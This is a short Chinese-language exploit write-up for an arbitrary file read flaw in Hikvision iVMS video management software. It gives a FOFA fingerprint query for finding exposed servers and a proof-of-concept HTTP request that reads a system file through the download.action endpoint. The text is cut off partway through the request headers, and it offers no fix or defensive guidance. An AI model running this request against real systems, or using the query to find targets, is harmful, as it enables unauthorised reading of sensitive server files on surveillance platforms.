HIKVISION iVMS download.action存在任意文件读取漏洞(DVB-2025-8938)

一、漏洞简介

海康威视iVMS（智能视频管理系统）是一款集视频监控、存储、管理、分析于一体的综合管理平台，广泛应用于安防领域。该产品支持多设备接入，提供实时监控、录像回放、智能分析、报警管理等功能，具备高可靠性和易用性，适用于各类场景如智慧城市、交通、金融、教育等，帮助用户实现高效、智能的安全管理。

海康威视iVMS download.action存在任意文件读取漏洞，攻击者可以读取服务器任何文件，获取服务器敏感信息

二、漏洞影响

海康威视iVMS 

三、网络测绘：

fofa:
icon_hash="-911494769"

四、复现过程

POC 1

GET /eps/triggerSnapshot/download.action?fileUrl=file:///C:/windows/win.ini HTTP/1.1
Host:
User-Agent: MicroMessenger
Accept-Encod